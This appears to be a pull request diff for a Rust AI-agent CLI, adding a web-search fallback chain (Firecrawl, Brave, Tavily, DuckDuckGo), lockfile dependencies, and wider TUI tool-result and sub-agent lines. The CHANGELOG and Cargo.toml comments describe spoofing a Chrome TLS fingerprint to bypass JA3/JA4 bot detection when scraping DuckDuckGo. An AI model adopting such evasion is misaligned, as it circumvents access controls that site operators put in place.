### PR TITLE
feat: v0.5.0 — web fallback chain + per-tool rich TUI display

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,10 +5,12 @@ Format follows [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ---
 
-## [Unreleased]
+## [0.5.0] — 2026-04-13
 
 ### Added
 
+- **Web search fallback chain — Firecrawl → Brave → Tavily → DuckDuckGo** — `web_search` now automatically cascades through available backends when a provider returns a 402, 429, 503, or structured `BackendError`. DuckDuckGo is the final no-key fallback and uses `wreq` (BoringSSL/Chrome TLS fingerprint) to bypass JA3/JA4 bot-detection. The fallback decision is based on typed `BackendError` variants rather than string matching, eliminating false-positive escalations.
+- **`wreq` dependency** — BoringSSL-backed HTTP client (`wreq = "5"`, Apache-2.0) replaces the plain `reqwest` path for DuckDuckGo scraping. Licensed Apache-2.0 and safe alongside `reqwest`'s `rustls-tls` because both use separate TLS backends.
 - **Per-tool rich result display in TUI done-lines** — `tool_display.rs` now ships `format_tool_result(tool_name, result, max_cols)`, a pure formatting layer that converts raw tool output strings into compact, informative summaries before they appear in the agent activity feed.  Each tool category gets a tailored treatment:
   - **terminal** — parses the `[terminal_result … exit_code=N]` structured header and renders `✓ 0  first-stdout-line` / `✗ N  first-error-line` with colour-graded outcome signal.
   - **execute_code** — parses the JSON result envelope `{status, output, error}` and renders `✓ first-output-line` / `✗ error-line`.

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -7,6 +7,27 @@ Format follows [Keep a Changelog](https://keepachangelog.com/en/1.0.0/).
 
 ## [Unreleased]
 
+### Added
+
+- **Per-tool rich result display in TUI done-lines** — `tool_display.rs` now ships `format_tool_result(tool_name, result, max_cols)`, a pure formatting layer that converts raw tool output strings into compact, informative summaries before they appear in the agent activity feed.  Each tool category gets a tailored treatment:
+  - **terminal** — parses the `[terminal_result … exit_code=N]` structured header and renders `✓ 0  first-stdout-line` / `✗ N  first-error-line` with colour-graded outcome signal.
+  - **execute_code** — parses the JSON result envelope `{status, output, error}` and renders `✓ first-output-line` / `✗ error-line`.
+  - **web_search** — parses `{results:[…]}` and renders `N results · first-title`.
+  - **web_extract** — parses `{result:{title,content}}` and renders `N.Nk chars · page title`.
+  - **web_crawl** — parses `{pages:[…]}` and renders `N pages crawled`.
+  - **read_file** — counts lines in the returned content and renders `N lines  first-meaningful-line`.
+  - **search_files** — counts match lines in the grep output and renders `N matches`.
+  - **write_file** — extracts byte count from `"Wrote N bytes"` banner and renders `✓ N bytes`.
+  - **apply_patch** — counts Modified/Created/Deleted entries and renders `✓ N file(s)`.
+  - **session_search** — parses results JSON and renders `N results`.
+  - **ha_call_service** — parses JSON success/error flag and renders `✓ ok` / `✗ error`.
+  - All other tools fall back to first meaningful line, single-spaced and truncated to the available column budget.
+- `format_tool_result` is automatically applied in both the compact done-line (`build_tool_done_line_width`) and the verbose detail line (`build_tool_verbose_lines_width`) — zero call-site changes required.
+
+### Changed
+
+- **Verbose result lines now use `format_tool_result` budget** — the verbose result line in `build_tool_verbose_lines_width` passes `verbose_width` to `format_tool_result`, so wide terminals surface significantly more result detail without truncation.
+
 ---
 
 ## [0.4.1] — 2026-04-13

--- a/Cargo.lock
+++ b/Cargo.lock
@@ -61,6 +61,21 @@ dependencies = [
 ]
 
 [[package]]
+name = "alloc-no-stdlib"
+version = "2.0.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "cc7bb162ec39d46ab1ca8c77bf72e890535becd1751bb45f64c597edb4c8c6b3"
+
+[[package]]
+name = "alloc-stdlib"
+version = "0.2.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "94fb8275041c72129eb51b7d0322c29b8387a0386127718b096429201a5d6ece"
+dependencies = [
+ "alloc-no-stdlib",
+]
+
+[[package]]
 name = "allocator-api2"
 version = "0.2.21"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -126,6 +141,12 @@ dependencies = [
 ]
 
 [[package]]
+name = "antidote"
+version = "1.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "34fde25430d87a9388dadbe6e34d7f72a462c8b43ac8d309b42b0a8505d7e2a5"
+
+[[package]]
 name = "anyhow"
 version = "1.0.102"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -161,6 +182,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "arc-swap"
+version = "1.9.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6a3a1fd6f75306b68087b831f025c712524bcb19aad54e557b1129cfa0a2b207"
+dependencies = [
+ "rustversion",
+]
+
+[[package]]
 name = "arg_enum_proc_macro"
 version = "0.3.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -184,6 +214,18 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "516b6b4f0e40d50dcda9365d53964ec74560ad4284da2e7fc97122cd83174516"
 dependencies = [
  "stable_deref_trait",
+]
+
+[[package]]
+name = "async-compression"
+version = "0.4.41"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d0f9ee0f6e02ffd7ad5816e9464499fba7b3effd01123b515c41d1697c43dad1"
+dependencies = [
+ "compression-codecs",
+ "compression-core",
+ "pin-project-lite",
+ "tokio",
 ]
 
 [[package]]
@@ -865,6 +907,24 @@ dependencies = [
 ]
 
 [[package]]
+name = "bindgen"
+version = "0.72.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "993776b509cfb49c750f11b8f07a46fa23e0a1386ffc01fb1e7d343efc387895"
+dependencies = [
+ "bitflags 2.11.0",
+ "cexpr",
+ "clang-sys",
+ "itertools 0.13.0",
+ "proc-macro2",
+ "quote",
+ "regex",
+ "rustc-hash 2.1.2",
+ "shlex",
+ "syn 2.0.117",
+]
+
+[[package]]
 name = "bit-set"
 version = "0.5.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -990,6 +1050,56 @@ dependencies = [
 ]
 
 [[package]]
+name = "boring-sys2"
+version = "4.15.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "ab6c876a958d17057d9d3a31075bb9609237413a1fe665432782c31ef596eb6b"
+dependencies = [
+ "autocfg",
+ "bindgen",
+ "cmake",
+ "fs_extra",
+ "fslock",
+]
+
+[[package]]
+name = "boring2"
+version = "4.15.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e4470e96bd94533c2f88c08be95a8e6d2d37a3b497a773b0a46273a376978f00"
+dependencies = [
+ "bitflags 2.11.0",
+ "boring-sys2",
+ "brotli",
+ "flate2",
+ "foreign-types",
+ "libc",
+ "openssl-macros",
+ "zstd",
+]
+
+[[package]]
+name = "brotli"
+version = "8.0.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "4bd8b9603c7aa97359dbd97ecf258968c95f3adddd6db2f7e7a5bef101c84560"
+dependencies = [
+ "alloc-no-stdlib",
+ "alloc-stdlib",
+ "brotli-decompressor",
+]
+
+[[package]]
+name = "brotli-decompressor"
+version = "5.0.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "874bb8112abecc98cbd6d81ea4fa7e94fb9449648c93cc89aa40c81c24d7de03"
+dependencies = [
+ "alloc-no-stdlib",
+ "alloc-stdlib",
+]
+
+[[package]]
 name = "bstr"
 version = "1.12.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1083,6 +1193,15 @@ dependencies = [
 ]
 
 [[package]]
+name = "cexpr"
+version = "0.6.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "6fac387a98bb7c37292057cffc56d62ecb629900026402633ae9160df93a8766"
+dependencies = [
+ "nom 7.1.3",
+]
+
+[[package]]
 name = "cfg-if"
 version = "1.0.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1111,7 +1230,7 @@ dependencies = [
  "num-traits",
  "serde",
  "wasm-bindgen",
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -1132,6 +1251,17 @@ checksum = "773f3b9af64447d2ce9850330c473515014aa235e6a783b02db81ff39e4a3dad"
 dependencies = [
  "crypto-common",
  "inout",
+]
+
+[[package]]
+name = "clang-sys"
+version = "1.8.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0b023947811758c97c59bf9d1c188fd619ad4718dcaa767947df1cadb14f39f4"
+dependencies = [
+ "glob",
+ "libc",
+ "libloading",
 ]
 
 [[package]]
@@ -1217,6 +1347,24 @@ dependencies = [
  "ryu",
  "static_assertions",
 ]
+
+[[package]]
+name = "compression-codecs"
+version = "0.4.37"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "eb7b51a7d9c967fc26773061ba86150f19c50c0d65c887cb1fbe295fd16619b7"
+dependencies = [
+ "brotli",
+ "compression-core",
+ "flate2",
+ "memchr",
+]
+
+[[package]]
+name = "compression-core"
+version = "0.4.31"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "75984efb6ed102a0d42db99afb6c1948f0380d1d91808d5529916e6c08b49d8d"
 
 [[package]]
 name = "console"
@@ -2012,6 +2160,7 @@ dependencies = [
  "url",
  "uuid",
  "which",
+ "wreq",
 ]
 
 [[package]]
@@ -2356,6 +2505,33 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "77ce24cb58228fbb8aa041425bb1050850ac19177686ea6e0f41a70416f56fdb"
 
 [[package]]
+name = "foreign-types"
+version = "0.5.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d737d9aa519fb7b749cbc3b962edcf310a8dd1f4b67c91c4f83975dbdd17d965"
+dependencies = [
+ "foreign-types-macros",
+ "foreign-types-shared",
+]
+
+[[package]]
+name = "foreign-types-macros"
+version = "0.2.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1a5c6c585bc94aaf2c7b51dd4c2ba22680844aba4c687be581871a6f518c5742"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
+]
+
+[[package]]
+name = "foreign-types-shared"
+version = "0.3.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "aa9a19cbb55df58761df49b23516a86d432839add4af60fc256da840f66ed35b"
+
+[[package]]
 name = "form_urlencoded"
 version = "1.2.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2378,6 +2554,16 @@ name = "fs_extra"
 version = "1.3.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "42703706b716c37f96a77aea830392ad231f44c9e9a67872fa5548707e11b11c"
+
+[[package]]
+name = "fslock"
+version = "0.2.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "04412b8935272e3a9bae6f48c7bfff74c2911f60525404edfdd28e49884c3bfb"
+dependencies = [
+ "libc",
+ "winapi",
+]
 
 [[package]]
 name = "futures"
@@ -2490,7 +2676,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1bd49230192a3797a9a4d6abe9b3eed6f7fa4c8a8a4947977c6f80025f92cbd8"
 dependencies = [
  "rustix",
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -2680,7 +2866,7 @@ checksum = "617aaa3557aef3810a6369d0a99fac8a080891b68bd9f9812a1eeda0c0730cbd"
 dependencies = [
  "cfg-if",
  "libc",
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -2736,6 +2922,24 @@ dependencies = [
  "http 1.4.0",
  "http-body 1.0.1",
  "pin-project-lite",
+]
+
+[[package]]
+name = "http2"
+version = "0.4.21"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a6e23815f8ec982e1452e1d0fda921ec20a9187fb610ad003c90cc5abd65b2c4"
+dependencies = [
+ "atomic-waker",
+ "bytes",
+ "fnv",
+ "futures-core",
+ "futures-sink",
+ "http 1.4.0",
+ "indexmap 2.13.1",
+ "slab",
+ "tokio",
+ "tokio-util",
 ]
 
 [[package]]
@@ -2865,6 +3069,26 @@ dependencies = [
  "tokio",
  "tower-service",
  "tracing",
+]
+
+[[package]]
+name = "hyper2"
+version = "1.5.5"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d1a1bb25e0cbdbe7b21f8ef6c3c4785f147d79e7ded438b5ee2b70e380183294"
+dependencies = [
+ "bytes",
+ "futures-channel",
+ "futures-util",
+ "http 1.4.0",
+ "http-body 1.0.1",
+ "http2",
+ "httparse",
+ "itoa",
+ "pin-project-lite",
+ "smallvec",
+ "tokio",
+ "want",
 ]
 
 [[package]]
@@ -3181,6 +3405,15 @@ checksum = "a6cb138bb79a146c1bd460005623e142ef0181e3d0219cb493e02f7d08a35695"
 
 [[package]]
 name = "itertools"
+version = "0.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "413ee7dfc52ee1a4949ceeb7dbc8a33f2d6c088194d9f922fb8318faf1f01186"
+dependencies = [
+ "either",
+]
+
+[[package]]
+name = "itertools"
 version = "0.14.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2b192c782037fadd9cfa75548310488aabdbf3d2da73885b31bd0abd03351285"
@@ -3334,6 +3567,16 @@ dependencies = [
 ]
 
 [[package]]
+name = "libloading"
+version = "0.8.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "d7c4b02199fee7c5d21a5ae7d8cfa79a6ef5bb2fc834d6e9058e89c825efdc55"
+dependencies = [
+ "cfg-if",
+ "windows-link 0.2.1",
+]
+
+[[package]]
 name = "libredox"
 version = "0.1.15"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -3363,6 +3606,21 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "3f50e8f47623268b5407192d26876c4d7f89d686ca130fdc53bced4814cd29f8"
 dependencies = [
  "bitflags 2.11.0",
+]
+
+[[package]]
+name = "linked-hash-map"
+version = "0.5.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0717cef1bc8b636c6e1c1bbdefc09e6322da8a9321966e8928ef80d20f7f770f"
+
+[[package]]
+name = "linked_hash_set"
+version = "0.1.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "984fb35d06508d1e69fc91050cceba9c0b748f983e6739fa2c7a9237154c52c8"
+dependencies = [
+ "linked-hash-map",
 ]
 
 [[package]]
@@ -3406,6 +3664,12 @@ checksum = "0fae87c125b03c1d2c0150c90365d7d6bcc53fb73a9acaef207d2d065860f062"
 dependencies = [
  "imgref",
 ]
+
+[[package]]
+name = "lru"
+version = "0.13.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "227748d55f2f0ab4735d87fd623798cb6b664512fe979705f829c9f81c934465"
 
 [[package]]
 name = "lru"
@@ -3877,7 +4141,7 @@ dependencies = [
  "ssh_format",
  "tokio",
  "tokio-io-utility",
- "typed-builder",
+ "typed-builder 0.23.2",
 ]
 
 [[package]]
@@ -3888,6 +4152,17 @@ checksum = "9879168afb48a235200e30d93df320b7191568cda8621df02f145c1c0f1af95a"
 dependencies = [
  "ssh_format_error",
  "thiserror 2.0.18",
+]
+
+[[package]]
+name = "openssl-macros"
+version = "0.1.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a948666b637a0f465e8564c73e89d4dde00d72d4d473cc972f390fc3dcee7d9c"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
 ]
 
 [[package]]
@@ -3970,7 +4245,7 @@ dependencies = [
  "libc",
  "redox_syscall 0.5.18",
  "smallvec",
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -4525,9 +4800,9 @@ dependencies = [
  "compact_str",
  "hashbrown 0.16.1",
  "indoc",
- "itertools",
+ "itertools 0.14.0",
  "kasuari",
- "lru",
+ "lru 0.16.3",
  "strum",
  "thiserror 2.0.18",
  "unicode-segmentation",
@@ -4577,7 +4852,7 @@ dependencies = [
  "hashbrown 0.16.1",
  "indoc",
  "instability",
- "itertools",
+ "itertools 0.14.0",
  "line-clipping",
  "ratatui-core",
  "strum",
@@ -4602,7 +4877,7 @@ dependencies = [
  "built",
  "cfg-if",
  "interpolate_name",
- "itertools",
+ "itertools 0.14.0",
  "libc",
  "libfuzzer-sys",
  "log",
@@ -5862,6 +6137,17 @@ dependencies = [
 ]
 
 [[package]]
+name = "tokio-boring2"
+version = "4.15.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "3866209c48e3d69e709a9d6105d7e2aa34e4374bc5dcaec32e0f8e53a28db14a"
+dependencies = [
+ "boring-sys2",
+ "boring2",
+ "tokio",
+]
+
+[[package]]
 name = "tokio-io-utility"
 version = "0.7.6"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -6170,11 +6456,31 @@ dependencies = [
 
 [[package]]
 name = "typed-builder"
+version = "0.21.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "fef81aec2ca29576f9f6ae8755108640d0a86dd3161b2e8bca6cfa554e98f77d"
+dependencies = [
+ "typed-builder-macro 0.21.2",
+]
+
+[[package]]
+name = "typed-builder"
 version = "0.23.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "31aa81521b70f94402501d848ccc0ecaa8f93c8eb6999eb9747e72287757ffda"
 dependencies = [
- "typed-builder-macro",
+ "typed-builder-macro 0.23.2",
+]
+
+[[package]]
+name = "typed-builder-macro"
+version = "0.21.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "1ecb9ecf7799210407c14a8cfdfe0173365780968dc57973ed082211958e0b18"
+dependencies = [
+ "proc-macro2",
+ "quote",
+ "syn 2.0.117",
 ]
 
 [[package]]
@@ -6251,7 +6557,7 @@ version = "2.0.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "16b380a1238663e5f8a691f9039c73e1cdae598a30e9855f541d29b08b53e9a5"
 dependencies = [
- "itertools",
+ "itertools 0.14.0",
  "unicode-segmentation",
  "unicode-width",
 ]
@@ -6694,9 +7000,9 @@ checksum = "b8e83a14d34d0623b51dce9581199302a221863196a1dde71a7663a4c2be9deb"
 dependencies = [
  "windows-implement",
  "windows-interface",
- "windows-link",
- "windows-result",
- "windows-strings",
+ "windows-link 0.2.1",
+ "windows-result 0.4.1",
+ "windows-strings 0.5.1",
 ]
 
 [[package]]
@@ -6723,9 +7029,35 @@ dependencies = [
 
 [[package]]
 name = "windows-link"
+version = "0.1.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5e6ad25900d524eaabdbbb96d20b4311e1e7ae1699af4fb28c17ae66c80d798a"
+
+[[package]]
+name = "windows-link"
 version = "0.2.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f0805222e57f7521d6a62e36fa9163bc891acd422f971defe97d64e70d0a4fe5"
+
+[[package]]
+name = "windows-registry"
+version = "0.5.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "5b8a9ed28765efc97bbc954883f4e6796c33a06546ebafacbabee9696967499e"
+dependencies = [
+ "windows-link 0.1.3",
+ "windows-result 0.3.4",
+ "windows-strings 0.4.2",
+]
+
+[[package]]
+name = "windows-result"
+version = "0.3.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "56f42bd332cc6c8eac5af113fc0c1fd6a8fd2aa08a0119358686e5160d0586c6"
+dependencies = [
+ "windows-link 0.1.3",
+]
 
 [[package]]
 name = "windows-result"
@@ -6733,7 +7065,16 @@ version = "0.4.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7781fa89eaf60850ac3d2da7af8e5242a5ea78d1a11c49bf2910bb5a73853eb5"
 dependencies = [
- "windows-link",
+ "windows-link 0.2.1",
+]
+
+[[package]]
+name = "windows-strings"
+version = "0.4.2"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "56e6c93f3a0c3b36176cb1327a4958a0353d5d166c2a35cb268ace15e91d3b57"
+dependencies = [
+ "windows-link 0.1.3",
 ]
 
 [[package]]
@@ -6742,7 +7083,7 @@ version = "0.5.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7837d08f69c77cf6b07689544538e017c1bfcf57e34b4c0ff58e6c2cd3b37091"
 dependencies = [
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -6787,7 +7128,7 @@ version = "0.61.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ae137229bcbd6cdf0f7b80a31df61766145077ddf49416a728b02cb3921ff3fc"
 dependencies = [
- "windows-link",
+ "windows-link 0.2.1",
 ]
 
 [[package]]
@@ -6827,7 +7168,7 @@ version = "0.53.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "4945f9f551b88e0d65f3db0bc25c33b8acea4d9e41163edf90dcd0b19f9069f3"
 dependencies = [
- "windows-link",
+ "windows-link 0.2.1",
  "windows_aarch64_gnullvm 0.53.1",
  "windows_aarch64_msvc 0.53.1",
  "windows_i686_gnu 0.53.1",
@@ -7089,6 +7430,45 @@ dependencies = [
 ]
 
 [[package]]
+name = "wreq"
+version = "5.3.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "137ed11c4c418fb3dc41db7323ebc49aa9b6fe6a24ce152e6b2de9d6fadd9c8f"
+dependencies = [
+ "antidote",
+ "arc-swap",
+ "async-compression",
+ "base64 0.22.1",
+ "boring2",
+ "bytes",
+ "futures-util",
+ "http 1.4.0",
+ "http-body 1.0.1",
+ "http-body-util",
+ "hyper2",
+ "ipnet",
+ "linked_hash_set",
+ "log",
+ "lru 0.13.0",
+ "mime",
+ "percent-encoding",
+ "pin-project-lite",
+ "serde",
+ "serde_json",
+ "serde_urlencoded",
+ "socket2 0.5.10",
+ "sync_wrapper",
+ "tokio",
+ "tokio-boring2",
+ "tokio-util",
+ "tower",
+ "tower-service",
+ "typed-builder 0.21.2",
+ "url",
+ "windows-registry",
+]
+
+[[package]]
 name = "writeable"
 version = "0.6.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -7269,6 +7649,34 @@ dependencies = [
  "crc32fast",
  "log",
  "simd-adler32",
+]
+
+[[package]]
+name = "zstd"
+version = "0.13.3"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "e91ee311a569c327171651566e07972200e76fcfe2242a4fa446149a3881c08a"
+dependencies = [
+ "zstd-safe",
+]
+
+[[package]]
+name = "zstd-safe"
+version = "7.2.4"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8f49c4d5f0abb602a93fb8736af2a4f4dd9512e36f7f570d66e65ff867ed3b9d"
+dependencies = [
+ "zstd-sys",
+]
+
+[[package]]
+name = "zstd-sys"
+version = "2.0.16+zstd.1.5.7"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "91e19ebc2adc8f83e43039e79776e3fda8ca919132d68a1fed6a5faca2683748"
+dependencies = [
+ "cc",
+ "pkg-config",
 ]
 
 [[package]]

--- a/Cargo.toml
+++ b/Cargo.toml
@@ -78,6 +78,11 @@ unicode-width = "0.2"
 
 # HTTP
 reqwest = { version = "0.12", default-features = false, features = ["json", "rustls-tls", "stream", "multipart"] }
+# Browser-emulating HTTP client (BoringSSL TLS + HTTP/2 fingerprint spoofing).
+# Used by DuckDuckGo search backend to bypass JA3/JA4 bot-detection.
+# Apache-2.0 only — Chrome TLS config set manually inline (no wreq-util GPL-3.0 dep).
+# NOTE: incompatible with openssl-sys; safe here because reqwest uses rustls-tls.
+wreq = { version = "5", default-features = false, features = ["json", "gzip", "brotli", "deflate"] }
 axum = "0.7"
 tokio-tungstenite = { version = "0.24", features = ["rustls-tls-webpki-roots"] }
 

--- a/crates/edgecrab-cli/src/app.rs
+++ b/crates/edgecrab-cli/src/app.rs
@@ -80,8 +80,10 @@ use crate::runtime::{
 };
 use crate::theme::{SkinConfig, Theme};
 use crate::tool_display::{
-    build_subagent_event_line, build_tool_done_line, build_tool_running_line,
-    build_tool_verbose_lines, tool_action_verb, tool_icon, tool_signature, tool_status_preview,
+    DisplayWidths, build_context_gauge, build_subagent_done_line_width,
+    build_subagent_running_line_width, build_tool_done_line_width, build_tool_running_line_width,
+    build_tool_verbose_lines_width, tool_action_verb, tool_icon, tool_signature,
+    tool_status_preview, tool_status_preview_width,
 };
 use crate::vision_models::{
     available_vision_model_options_with_dynamic, canonical_provider, current_model_supports_vision,
@@ -2277,14 +2279,16 @@ enum DisplayState {
     /// input area.  When active, the main input is locked and keybindings are
     /// redirected here.
     WaitingForApproval {
-        /// Short display label (content after truncation to ~50 chars).
+        /// Display label (full command — no longer truncated).
         command: String,
-        /// Full command string shown only when user presses 'v' (view).
+        /// Full command string (kept for backward compatibility; identical to `command`).
         full_command: String,
         /// Currently highlighted choice index (0–3 in [Once, Session, Always, Deny]).
         selected: usize,
-        /// Whether the "view" mode is active (shows full_command in overlay).
+        /// Whether the "view" mode is active (legacy — kept for key-handler symmetry).
         show_full: bool,
+        /// Vertical scroll offset for long commands that exceed the visible area.
+        scroll_offset: u16,
     },
     /// The agent is requesting a secret value from the user (e.g. an API key
     /// or sudo password).
@@ -4515,6 +4519,9 @@ pub struct App {
     active_skills: Vec<String>,
 
     // ── Scroll tracking (best-practice UX) ──────────────────────────
+    /// Last known terminal width (updated each render frame). Used by event
+    /// handlers to build width-adaptive tool display spans outside the render loop.
+    last_terminal_width: u16,
     /// Estimated total visual rows in the output area (updated each render)
     output_visual_rows: u16,
     /// Height of the last rendered output viewport (updated each render)
@@ -4613,6 +4620,13 @@ pub struct App {
     /// out of order. Matching by `tool_call_id` avoids upgrading the wrong line
     /// when completion events race.
     pending_tool_lines: std::collections::HashMap<String, PendingToolLine>,
+    /// In-flight sub-agent placeholder lines keyed by `task_index`.
+    ///
+    /// Mirrors `pending_tool_lines` for the delegated-child sub-agent lifecycle:
+    /// - `SubAgentStart`      → insert placeholder line + record index
+    /// - `SubAgentReasoning` / `SubAgentToolExec` → update line in-place
+    /// - `SubAgentFinish`     → replace with done line + remove entry
+    pending_subagent_lines: std::collections::HashMap<usize, PendingSubagentLine>,
     /// Tool call ids deliberately suppressed from the transcript by display policy.
     hidden_tool_calls: HashSet<String>,
     /// Signatures already rendered in the current turn for `tool_progress: new`.
@@ -4648,6 +4662,22 @@ struct PendingToolLine {
     args_json: String,
     line_idx: usize,
     edit_snapshot: Option<LocalEditSnapshot>,
+}
+
+/// Tracks a sub-agent placeholder output line so it can be updated in-place.
+///
+/// When `SubAgentStart` fires, we push a running placeholder and record its
+/// index here.  `SubAgentReasoning` / `SubAgentToolExec` update it in-place.
+/// `SubAgentFinish` replaces it with a structured done line.
+struct PendingSubagentLine {
+    /// Index into `self.output` for the placeholder line.
+    line_idx: usize,
+    /// Wall-clock start time — used to compute elapsed in the running line.
+    started_at: Instant,
+    /// Original task goal (first line of subagent prompt).
+    goal: String,
+    /// Total sub-agent count in this delegate batch.
+    task_count: usize,
 }
 
 struct VoiceRecordingSession {
@@ -5055,6 +5085,7 @@ impl App {
         self.active_subagents.clear();
         self.turn_stream_tokens = 0;
         self.pending_tool_lines.clear();
+        self.pending_subagent_lines.clear();
         self.hidden_tool_calls.clear();
         self.active_tools.clear();
         self.seen_tool_signatures.clear();
@@ -5262,6 +5293,7 @@ impl App {
             statusbar_selector_cursor: 0, // default to Visible
             skills_completion_names: Vec::new(),
             active_skills: Vec::new(),
+            last_terminal_width: 80,
             output_visual_rows: 0,
             output_area_height: 24,
             at_bottom: true,
@@ -5296,6 +5328,7 @@ impl App {
             in_flight_tool_count: 0,
             turn_stream_tokens: 0,
             pending_tool_lines: std::collections::HashMap::new(),
+            pending_subagent_lines: std::collections::HashMap::new(),
             hidden_tool_calls: HashSet::new(),
             seen_tool_signatures: HashSet::new(),
             voice_recording: None,
@@ -12074,11 +12107,12 @@ impl App {
                         // ToolDone later upgrades it in-place with timing/result
                         // info (no layout shift).
                         let edit_snapshot = capture_local_edit_snapshot(&name, &args_json);
-                        let running_spans = build_tool_running_line(
+                        let running_spans = build_tool_running_line_width(
                             &name,
                             &args_json,
                             None,
                             &self.theme.tool_emojis,
+                            &DisplayWidths::from_terminal_width(self.last_terminal_width as usize),
                         );
                         let line_idx = self.output.len();
                         self.output.push(OutputLine {
@@ -12144,12 +12178,16 @@ impl App {
                     }) = self.pending_tool_lines.get(&tool_call_id).cloned()
                     {
                         if line_idx < self.output.len() {
-                            self.output[line_idx].prebuilt_spans = Some(build_tool_running_line(
-                                &tool_name,
-                                &args_json,
-                                Some(detail.as_str()),
-                                &self.theme.tool_emojis,
-                            ));
+                            self.output[line_idx].prebuilt_spans =
+                                Some(build_tool_running_line_width(
+                                    &tool_name,
+                                    &args_json,
+                                    Some(detail.as_str()),
+                                    &self.theme.tool_emojis,
+                                    &DisplayWidths::from_terminal_width(
+                                        self.last_terminal_width as usize,
+                                    ),
+                                ));
                             self.output[line_idx].invalidate_render_cache();
                         }
                     } else {
@@ -12176,13 +12214,16 @@ impl App {
                     let pending = self.pending_tool_lines.remove(&tool_call_id);
                     self.active_tools.remove(&tool_call_id);
                     if !hidden {
-                        let spans = build_tool_done_line(
+                        let widths =
+                            DisplayWidths::from_terminal_width(self.last_terminal_width as usize);
+                        let spans = build_tool_done_line_width(
                             &name,
                             &args_json,
                             result_preview.as_deref(),
                             duration_ms,
                             is_error,
                             &self.theme.tool_emojis,
+                            &widths,
                         );
                         // Upgrade the in-flight placeholder in-place (if present).
                         //
@@ -12204,11 +12245,12 @@ impl App {
                             self.push_output_spans(spans, OutputRole::Tool);
                         }
                         if self.tool_progress_mode == ToolProgressMode::Verbose {
-                            for line in build_tool_verbose_lines(
+                            for line in build_tool_verbose_lines_width(
                                 &name,
                                 &args_json,
